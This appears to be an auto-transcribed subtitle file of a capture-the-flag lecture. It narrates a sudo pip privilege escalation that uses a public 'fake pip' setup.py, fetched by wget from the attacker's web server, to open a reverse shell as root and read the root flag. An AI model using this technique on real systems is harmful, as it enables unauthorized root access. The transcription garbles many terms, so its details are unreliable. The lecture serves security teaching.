1
00:00:01,050 --> 00:00:08,070
Hi, within this lecture, we're going to try and escalate our privileges one last time because we're

2
00:00:08,070 --> 00:00:12,550
going to be rude eventually if we can manage it, of course.

3
00:00:13,020 --> 00:00:16,370
So right now, we are the devil we were, Mamadu.

4
00:00:16,530 --> 00:00:18,720
So we are making our way to the top.

5
00:00:19,020 --> 00:00:21,800
So let me close everything over here, OK?

6
00:00:22,080 --> 00:00:23,850
And try to focus over there.

7
00:00:24,450 --> 00:00:29,310
So right now, we're dev ops and we want to be rude.

8
00:00:29,310 --> 00:00:30,600
So how do we do that?

9
00:00:30,930 --> 00:00:34,820
Let me show you another technique that we can use other than find.

10
00:00:35,250 --> 00:00:42,150
So I'm going to open my notes one more time and let me scroll down a little bit and show you something.

11
00:00:42,690 --> 00:00:47,610
So as you can see, there are a couple of automated tools that we're going to dive into later on.

12
00:00:47,820 --> 00:00:48,860
And here you go.

13
00:00:48,990 --> 00:00:57,230
As you can see, we have this command called Pseudo Dash L, So it's a very simple comment, OK?

14
00:00:57,450 --> 00:01:04,640
And it actually gives us what we can do as a sudar or as an administrator user.

15
00:01:05,070 --> 00:01:14,280
And it works OK, just around Studwell and you will see what kind of things that we can run like, as

16
00:01:14,280 --> 00:01:23,550
if we are an administrator user so we can actually run the pip over here.

17
00:01:23,550 --> 00:01:29,990
So user Delfs may run the following commands like Canada and it's not like a set UID thingy.

18
00:01:30,690 --> 00:01:32,200
So this is very common.

19
00:01:32,220 --> 00:01:40,620
OK, so a route or administrator can decide to give permissions to run some kind of binaries like this

20
00:01:40,620 --> 00:01:48,020
one to the users or to some groups like developer groups, because it's necessary on the server.

21
00:01:48,120 --> 00:01:48,540
Right.

22
00:01:48,540 --> 00:01:50,710
Like in this case we can run Pip.

23
00:01:51,270 --> 00:01:53,190
So what can we do with Pip?

24
00:01:53,460 --> 00:01:55,890
Pip is a Python package manager.

25
00:01:55,890 --> 00:02:01,200
If you don't know what it is, I hope you know a little bit python so you can understand what we are

26
00:02:01,200 --> 00:02:02,190
doing over here.

27
00:02:02,760 --> 00:02:05,300
And I'm going to show you what we can do with it.

28
00:02:05,760 --> 00:02:10,530
I'm going to run user bimbette and exploit, OK?

29
00:02:10,800 --> 00:02:14,260
And of course, pseudo something like that in Google.

30
00:02:14,820 --> 00:02:18,630
So once you do that, you will see a lot of tools over there.

31
00:02:18,840 --> 00:02:21,310
So it's a common thing.

32
00:02:21,600 --> 00:02:22,650
Yeah, apparently.

33
00:02:22,650 --> 00:02:25,320
And there is something called fake Pip.

34
00:02:25,650 --> 00:02:28,550
So fake Pip, you can't just search for that as well.

35
00:02:29,160 --> 00:02:39,330
So as you can see, it says that it's exploit Sudar with user install and that is exactly what we are

36
00:02:39,330 --> 00:02:41,240
trying to do over here.

37
00:02:41,250 --> 00:02:41,710
Right.

38
00:02:42,240 --> 00:02:46,830
So as you can see, it gives the same demonstration over here.

39
00:02:46,860 --> 00:02:51,720
They run pseudo URL and they listed this Tingay.

40
00:02:51,930 --> 00:03:00,810
And over here, if we can go to the command itself, it's kind of what we have actually run in the previous

41
00:03:00,810 --> 00:03:01,460
lecture.

42
00:03:01,470 --> 00:03:03,990
OK, it's doing a reverse shell.

43
00:03:04,380 --> 00:03:10,910
Of course, that's how we are going to get the shell and we have the thing going on over there.

44
00:03:11,700 --> 00:03:17,220
So of course, we're going to have to change the whole system part one more time, at least the host

45
00:03:17,220 --> 00:03:17,940
itself.

46
00:03:18,210 --> 00:03:20,290
But we can actually use this.

47
00:03:21,060 --> 00:03:24,900
So how do we use this over here?

48
00:03:24,900 --> 00:03:34,510
Apparently in the GitHub of this guy, we see the instructions we can run this OK, user been pip install,

49
00:03:34,530 --> 00:03:41,890
upgrade, first reinstall, but we have to download the setup via file into remote target and execute

50
00:03:41,890 --> 00:03:43,200
this in local folder.

51
00:03:43,990 --> 00:03:52,590
So first of all, we're going to have to download this or just copy and paste the code into our server,

52
00:03:52,920 --> 00:03:54,600
into our target server.

53
00:03:55,260 --> 00:03:59,120
So we are currently in the target server, right.

54
00:03:59,130 --> 00:04:03,040
As Mamadu first and now with that ops.

55
00:04:03,480 --> 00:04:09,420
So first of all, we're going to have to download that, set up the PRI file into the target.

56
00:04:09,960 --> 00:04:19,800
And if we actually execute that in the local folder, then we're going to get back some connection and

57
00:04:20,220 --> 00:04:23,420
hopefully this connection will be sent as a route.

58
00:04:24,030 --> 00:04:29,880
So in order to copy this, you can just come over here like we have learnt in the Bendat.

59
00:04:30,120 --> 00:04:31,040
Just copy this.

60
00:04:31,060 --> 00:04:34,080
Get over here and try to clone it.

61
00:04:34,170 --> 00:04:34,680
Right.

62
00:04:34,980 --> 00:04:37,350
Let's try and see.

63
00:04:37,380 --> 00:04:37,810
Yep.

64
00:04:37,830 --> 00:04:38,880
Clear doesn't work.

65
00:04:38,880 --> 00:04:45,690
We don't even have like a proper shadow over here and we don't even have a git command as well.

66
00:04:46,110 --> 00:04:54,710
So let's see, we have we get OK, we can try to run, we get we get this kind of downloading something.

67
00:04:55,170 --> 00:04:59,010
OK, so let me try to download everything over here.

68
00:04:59,490 --> 00:05:07,320
And see, yes, if you say yes, we can see fake pipe over here, let me go into the fake pipe and see

69
00:05:07,320 --> 00:05:08,350
if we can get it.

70
00:05:09,450 --> 00:05:12,590
No, we cannot see into the fake pipe.

71
00:05:12,630 --> 00:05:18,080
OK, so I believe there is something wrong over here.

72
00:05:18,120 --> 00:05:19,340
Let's try one more time.

73
00:05:19,350 --> 00:05:23,280
Nope, it doesn't work if you're on the let's fake it.

74
00:05:23,280 --> 00:05:24,360
Seize over there.

75
00:05:24,360 --> 00:05:26,520
But we cannot see into that.

76
00:05:27,630 --> 00:05:30,170
There's something wrong if we say Al-Saleh.

77
00:05:30,840 --> 00:05:32,970
And here you go.

78
00:05:32,970 --> 00:05:39,390
I believe this thinks that fake pipe isn't a folder, but it's a file.

79
00:05:39,810 --> 00:05:43,680
But I believe you're downloading it in a wrong way.

80
00:05:44,010 --> 00:05:47,640
So let me just run the we get over here and see what's going on.

81
00:05:48,390 --> 00:05:51,960
And this is not what I expect to write.

82
00:05:51,960 --> 00:05:59,040
So let me just copy this from here and come over there and try to re get it under control over here

83
00:05:59,400 --> 00:06:02,760
in our own color, Linux to see what's wrong over there.

84
00:06:03,000 --> 00:06:04,890
OK, so let me run it.

85
00:06:04,890 --> 00:06:07,200
Let's let me into that.

86
00:06:08,250 --> 00:06:08,520
Yeah.

87
00:06:08,520 --> 00:06:13,260
It says that it's not a directory, it's a file apparently.

88
00:06:13,620 --> 00:06:15,450
So let me save file fake pip.

89
00:06:15,690 --> 00:06:15,990
Yeah.

90
00:06:15,990 --> 00:06:17,370
It's some HTML document.

91
00:06:17,370 --> 00:06:25,800
So it doesn't clone or it doesn't download the Python codes, but it actually downloads the HDMI folder.

92
00:06:26,040 --> 00:06:28,620
So I'm just going to clone this on my own index.

93
00:06:28,950 --> 00:06:32,820
So let me remove this fake paper over here, OK.

94
00:06:33,030 --> 00:06:39,660
And I'm just going to get clone the thing so that we can actually see the Python code, at least in

95
00:06:39,660 --> 00:06:46,170
our own color Linux, then maybe we can try to move that file to our remote server.

96
00:06:46,380 --> 00:06:48,570
So I'm going to go into the fake paper right now.

97
00:06:48,750 --> 00:06:50,010
Yep, here we go.

98
00:06:50,490 --> 00:06:56,070
Now, let's try to find the setup that p right.

99
00:06:56,070 --> 00:06:56,760
Here you go.

100
00:06:56,880 --> 00:07:05,160
Now, we want to just take the take everything inside of the set up that way and just move them into

101
00:07:05,160 --> 00:07:09,120
our server and let me change this localhost over here.

102
00:07:09,450 --> 00:07:15,450
I'm going to say Tanno two four which is my own colonics IP and for port you can just keep it.

103
00:07:15,720 --> 00:07:20,070
And over here let's see if we have some kind of IP stuff over there.

104
00:07:20,790 --> 00:07:21,410
Nope.

105
00:07:21,720 --> 00:07:22,050
Yeah.

106
00:07:22,050 --> 00:07:27,390
Al Hosten Allport is embedded as a variable over here, so we don't have to change anything else.

107
00:07:27,960 --> 00:07:34,350
So for our part you can leave it as it is or you can choose any other path if it doesn't work for you.

108
00:07:35,070 --> 00:07:36,570
But make sure you don't do this.

109
00:07:36,570 --> 00:07:38,910
One, two, three, four, because we already use that.

110
00:07:39,240 --> 00:07:49,290
OK, so I'm going to try and just send the setup that y to our server so you can just copy and pasting

111
00:07:49,470 --> 00:07:54,000
this thing or you can even write it on your own in the server as well.

112
00:07:54,360 --> 00:08:03,240
And you can try to do it in a more, I don't know, complex way, like try to put this into your own

113
00:08:03,240 --> 00:08:07,410
Apache server and just try to we get it from there.

114
00:08:08,100 --> 00:08:17,170
For example, let me just clear this stuff and let me try to copy the set up the PVI into my var w w

115
00:08:17,240 --> 00:08:23,550
w HDMI folder, which is my Apache to server route folder, if you know what I mean.

116
00:08:23,970 --> 00:08:29,670
Now what I'm going to do, I'm going to just say service Apache to start in order to make my approach

117
00:08:29,670 --> 00:08:30,630
to server run.

118
00:08:31,110 --> 00:08:36,390
And now I have a website running on over here and inside of my website.

119
00:08:36,540 --> 00:08:39,390
I have set up that P right now.

120
00:08:39,390 --> 00:08:46,740
I will just reach that set up that P right from my own colonics from the target server.

121
00:08:47,100 --> 00:08:47,550
Right.

122
00:08:47,550 --> 00:08:50,640
If I come over here I can write Tenno too far.

123
00:08:50,970 --> 00:08:54,650
And so I set up that P by now I can reach that file.

124
00:08:54,840 --> 00:08:59,340
Of course we are going to have to do this in the server, not in the local machine.

125
00:08:59,820 --> 00:09:02,280
And we can easily do that by running.

126
00:09:02,280 --> 00:09:08,120
We get and say like https we get.

127
00:09:08,130 --> 00:09:10,320
I have to htp not htp.

128
00:09:10,340 --> 00:09:15,630
Sorry, we're gonna have to specify the whole path over here rather than just one or two four.

129
00:09:15,960 --> 00:09:20,580
So like this htp tenno two for setup that PBI.

130
00:09:20,970 --> 00:09:24,180
OK, so if you hit enter it will download it.

131
00:09:24,300 --> 00:09:26,010
And now if I run that SLA.

132
00:09:26,010 --> 00:09:26,610
Here you go.

133
00:09:26,610 --> 00:09:29,850
Now we see the setup that P right over here.

134
00:09:30,180 --> 00:09:39,690
Now if you remember the instructions, it says that just download the setup that PBI into your target

135
00:09:39,690 --> 00:09:40,230
machine.

136
00:09:40,410 --> 00:09:42,240
And that's exactly what we did.

137
00:09:42,510 --> 00:09:42,930
Right.

138
00:09:42,930 --> 00:09:48,330
We managed to just get this setup that play into our target machine.

139
00:09:48,600 --> 00:09:56,220
And it was actually nice to change the IP address from colonics as well so that we don't deal that deal

140
00:09:56,220 --> 00:09:58,410
with it inside of the target server.

141
00:09:58,560 --> 00:09:59,070
Maybe we.

142
00:09:59,150 --> 00:10:02,420
Don't even have Nano or rim over here, we don't know yet.

143
00:10:02,870 --> 00:10:09,590
OK, so what I'm going to do, I'm going to listen for income, incoming corrections for the poor,

144
00:10:09,590 --> 00:10:15,330
13 three seven two, because that's our outport is right.

145
00:10:15,830 --> 00:10:21,830
So what I'm going to do next, I'm going to go back to this fake pimp and just run the thing that it

146
00:10:22,070 --> 00:10:23,280
asks us to run.

147
00:10:23,660 --> 00:10:30,760
So we're going to run the user being pimp install and we going to install and upgrade our for first

148
00:10:30,830 --> 00:10:32,990
install the thing over here.

149
00:10:33,200 --> 00:10:36,380
And we are running this as pseudo as you can see.

150
00:10:36,620 --> 00:10:39,190
We're running it with pseudo comment.

151
00:10:39,920 --> 00:10:41,240
And here you go.

152
00:10:41,330 --> 00:10:43,700
Now it has been executed.

153
00:10:44,090 --> 00:10:45,790
We can run this with pseudocode.

154
00:10:45,800 --> 00:10:46,310
MANDVI Why?

155
00:10:46,310 --> 00:10:49,220
Because it's it's allowing us to do so.

156
00:10:49,700 --> 00:10:54,610
And if you come over here to your callisthenics, you're finally rude.

157
00:10:54,830 --> 00:10:57,230
So this fake pimp does work.

158
00:10:57,240 --> 00:10:59,690
OK, thanks for this guy.

159
00:10:59,690 --> 00:11:02,380
OK, and if you're on, who am I?

160
00:11:02,540 --> 00:11:04,340
We are again, rude.

161
00:11:04,670 --> 00:11:12,650
So if we run, unless we can see we are inside of some folder, if you run locate route that you can

162
00:11:12,650 --> 00:11:20,540
see that it's in the seed root folder, you can go for the route or you can just cut this out, not

163
00:11:20,540 --> 00:11:23,610
see the route, but cat route through text.

164
00:11:23,810 --> 00:11:24,860
And here you go.

165
00:11:24,860 --> 00:11:27,800
We have the final flag over here.

166
00:11:28,160 --> 00:11:31,390
So we managed to solve the candombe.

167
00:11:32,420 --> 00:11:37,730
So if you're thinking that, yeah, we managed to solve it and I understood everything, but there are

168
00:11:37,730 --> 00:11:38,990
a lot of ways to go.

169
00:11:38,990 --> 00:11:41,110
So how did you know which way to go?

170
00:11:41,450 --> 00:11:46,610
Of course, there are a lot of leads and we're going to cover them in the privileged escalation sections

171
00:11:46,610 --> 00:11:47,990
again during this course.

172
00:11:48,140 --> 00:11:52,210
And we're going to cover a lot of gaining access information here as well.

173
00:11:52,520 --> 00:11:58,160
Remember that this is not the first time that I'm solving this KTRV.

174
00:11:58,340 --> 00:12:05,270
I've saw this couple of years ago and took me a lot more than one hour or one and a half hour.

175
00:12:05,270 --> 00:12:08,900
I don't know how many how much time that we spent on this one.

176
00:12:09,740 --> 00:12:14,630
Now, it took me less because I almost knew which direction to go.

177
00:12:14,870 --> 00:12:22,100
I didn't remember everything, but it was easy for me to guide myself through something, for example,

178
00:12:22,100 --> 00:12:26,090
for the current type thing or from Chrome Cronje uptake.

179
00:12:26,780 --> 00:12:29,180
I was listening for the incoming connection.

180
00:12:29,330 --> 00:12:35,390
If I wasn't listening for the incoming connection, then I wouldn't have got the connection back from

181
00:12:35,390 --> 00:12:35,830
the server.

182
00:12:37,220 --> 00:12:42,380
Then I wouldn't have the chance to understand that it's being executed on its own.

183
00:12:42,560 --> 00:12:46,430
And maybe I would think that, yeah, I'm getting back the connection.

184
00:12:46,430 --> 00:12:50,120
But as a Mamadu, not Daboub soldier or user.

185
00:12:50,540 --> 00:12:53,390
But anyhow, we got the root flag.

186
00:12:53,390 --> 00:12:55,910
I'm just going to make a note of that as well.

187
00:12:56,600 --> 00:13:00,140
Again, don't worry about the alternative stuff.

188
00:13:00,140 --> 00:13:03,260
We're going to learn a lot of alternatives during the course.

189
00:13:03,260 --> 00:13:06,170
This is why we are doing it in the first place.

190
00:13:06,530 --> 00:13:13,870
OK, so I'm going to come over here and just ride through text and just pasted over there.

191
00:13:14,240 --> 00:13:16,370
See you in the next section.